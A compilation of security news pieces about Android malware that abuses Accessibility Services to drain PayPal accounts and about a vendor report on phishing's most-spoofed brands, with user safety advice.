While assuring its users, PayPal said that it “implemented additional controls on the security challenge request to prevent token reuse, which resolved the issue, and no evidence of abuse was found.”

An Android Malware's Robbing PayPal Accounts!



Security researchers have advised the Android users to keep a check on their PayPal accounts as quite recently, an Android malware has emerged which could easily dodge the security authentication of the application.

Not of late, a case got reported wherein a 1,000 pounds attempt at pilfering the victim’s PayPal account was made.

The attacking cyber-con enters the victim’s PayPal account on their own and easily penetrates the application’s Two-Factor-Authentication (2FA). There’s no role of harvesting login credentials.
 
The users, who have and haven’t activated their Two-Factor-Authentication, are susceptible to this attack alike.

The malware which is reportedly being distributed by a third party, primarily, has the Android’s PayPal app on its radar. Other malware with the same disposition have also been dug out.

By manipulating Android’s Accessibility Services is how the cyber-con behind it all, targets its aim on PayPal.

A researching organization got its hands on the malware which is distributed on third-party app stores and was concealed behind the veil of a battery optimization tool which goes by the name of “Optimization Android”.
Google Play Store has been a part of hearsay because of other malware that have been found on it which possess a similar flair for targeting banking apps.

The aforementioned malware’s key operation is to pilfer money from its target’s PayPal account by initiating a malicious service into the victim’s system.

And to activate this service a request is sent to the victim by the so called bland “Enable Statistics Service”.

If on a vulnerable device the official PayPal is downloaded, the malware would flash a notification to launch it.

The attacker need only wait for the user to log into the app. Once that happens, the “Accessibility Service” would start to impersonate the user’s click and will transfer the money from the victim’s account to the PayPal Address of the cyber-con.

According to the researchers, the attack doesn’t take more than seconds to fall through and in no practical reality can a user stop it in time.


The kind of currency that gets transferred hinges on the victim’s location. The work’s done within a short duration of 5 seconds.
 
The only loophole for the attackers and the only chance at the users’ safety is the kind of balance the victim has. That is, if there is less balance in the account than what the attacker has asked for and no payment cards attached to the account.

Every time the official PayPal application is launched onto the system, the improper “Accessibility Service” gets activated, making the device vulnerable to numerous more attacks.

PayPal has been officially contacted and informed about the erroneous makeup of the application and the risk the users entail.

Five other applications with an analogous disposition to the Optimization Android have been exposed in recent times, on the Google App store.

Rumor has it, that the users with this app already on their ‘downloaded apps’ list have potentially by now entered the trap and fallen prey to the attack.

A few users in Brazil have also come across this unfortunate attack.


Remedies And Advice From The Researchers
·         Keep on checking the application for any fishy transactions. If found, contact the PayPal Resolution Center and report the issue.
·         Keep track of the PayPal account balance.
·         It would really help to change the internet banking and connected e-mail passwords.
·         Try using “Android’s Safe Mode” and try uninstalling the app with the name, “Optimization Android”.
·         Keep your devices updated.
·         Keep a check on what permissions you grant to the application so downloaded.
·         Only use the official Google Play Store App to download other applications.


Android Malware Steals 1,000 Euros In Around 5 Seconds Via PayPal



Another malware discovered in November masked as a battery enhancement application—called Android Optimization is as of late been brought into highlight to have been customized in such a way so as to send 1,000 euros to cyberthieves by means of PayPal in around 5 seconds and all this without the user being able to stop it.

The malware is being circulated by third party applications therefore making it unavailable in the official Google Play Store.

The malware is depicted as one to sagaciously exploit Google's Accessibility Services, intended to assist individuals with disabilities, to trick users into giving the hackers some control of the phone.

After the malware approaches the user for authorization to "Enable Statistics "in the wake of being installed this empowers the cybercriminals to take control of the phone remotely when the user opens certain applications, for the most part some being: PayPal, Google Play, WhatsApp, Skype, Viber, Gmail, and some other banking applications.

ESET researchers found that the malware can demonstrate users overlay phishing pages made to look like legitimate banking applications, or other well-known applications, such as, Gmail, WhatsApp, Skype and Viber, approaching the users for credit card certifications.

 “The whole process takes about 5 seconds, and for an unsuspecting user, there is no feasible way to intervene in time. The attackers fail only if the user has insufficient PayPal balance and no payment card connected to the account. The malicious Accessibility service is activated every time the PayPal app is launched, meaning the attack could take place multiple times.” wrote ESET researcher Lukas Stefanenko in a blog post.

A video by ESET showing how the malware works




Microsoft, Netflix and PayPal Emerge As the Top Targets for Phishing Attacks



Email security provider Vade Secure released another phishing report following the 25 most 'spoofed' brands in North America that are imitated in phishing attacks. Amongst them the top three are Microsoft, Netflix and PayPal.

Out of all the 86 brands that were tracked, 96% of them all were done so by the company as per their Q3 2018 report.

Bank of America and Wells Fargo are not so far behind Microsoft and the other top 2 targets in this case as there has been an increase in these phishing attacks by approximately 20.4% as reported by Vade Secure. As the attackers attempt to access Office 365, One Drive, and Azure credentials their focus has been towards cloud based services as well as financial companies.



Vade Secure's report states - "The primary goal of Microsoft phishing attacks is to harvest Office 365 credentials. With a single set of credentials, hackers can gain access to a treasure trove of confidential files, data, and contacts stored in Office 365 apps, such as SharePoint, One Drive, Skype, Excel, CRM, etc. Moreover, hackers can use these compromised Office 365 accounts to launch additional attacks, including spear phishing, malware, and, increasingly, insider attacks targeting other users within the same organization."

The attackers, through a feeling of urgency endeavor to show that the recipient's account has been suspended or so thus inciting them to login in order to determine the issue, this happens in the case of Office 365 phishing emails. By doing this though they expect for the victims to be less wary when entering their credentials.

Exceptionally compelling is that attackers have a tendency to pursue a pattern with respect to what days they send the most volume of phishing mails. As per the report, most business related attacks tend to happen amid the week with Tuesday and Thursday being the most popular days. For Netflix though, the most focused on days are Sunday because that is the time when users' are taking a backseat and indulge in some quality television.

As these attacks become more targeted Vade Secure’s report further states – "What should be more concerning to security professionals is that phishing attacks are becoming more targeted. When we correlated the number of phishing URLs against the number of phishing emails blocked by our filter engine, we found that the number of emails sent per URL dropped more than 64% in Q3. This suggests that hackers are using each URL in fewer emails in order to avoid by reputation-based security defenses. In fact, we’ve seen sophisticated phishing attacks where each email contains a unique URL, essentially guaranteeing that they will bypass traditional email security tools."

For the users' however , it is advised to dependably examine a site before entering any login details and if there are any occurrences of the URL seeming abnormal or even something as minor as a language blunders then they should report the issue directly to either the administrator or the company itself.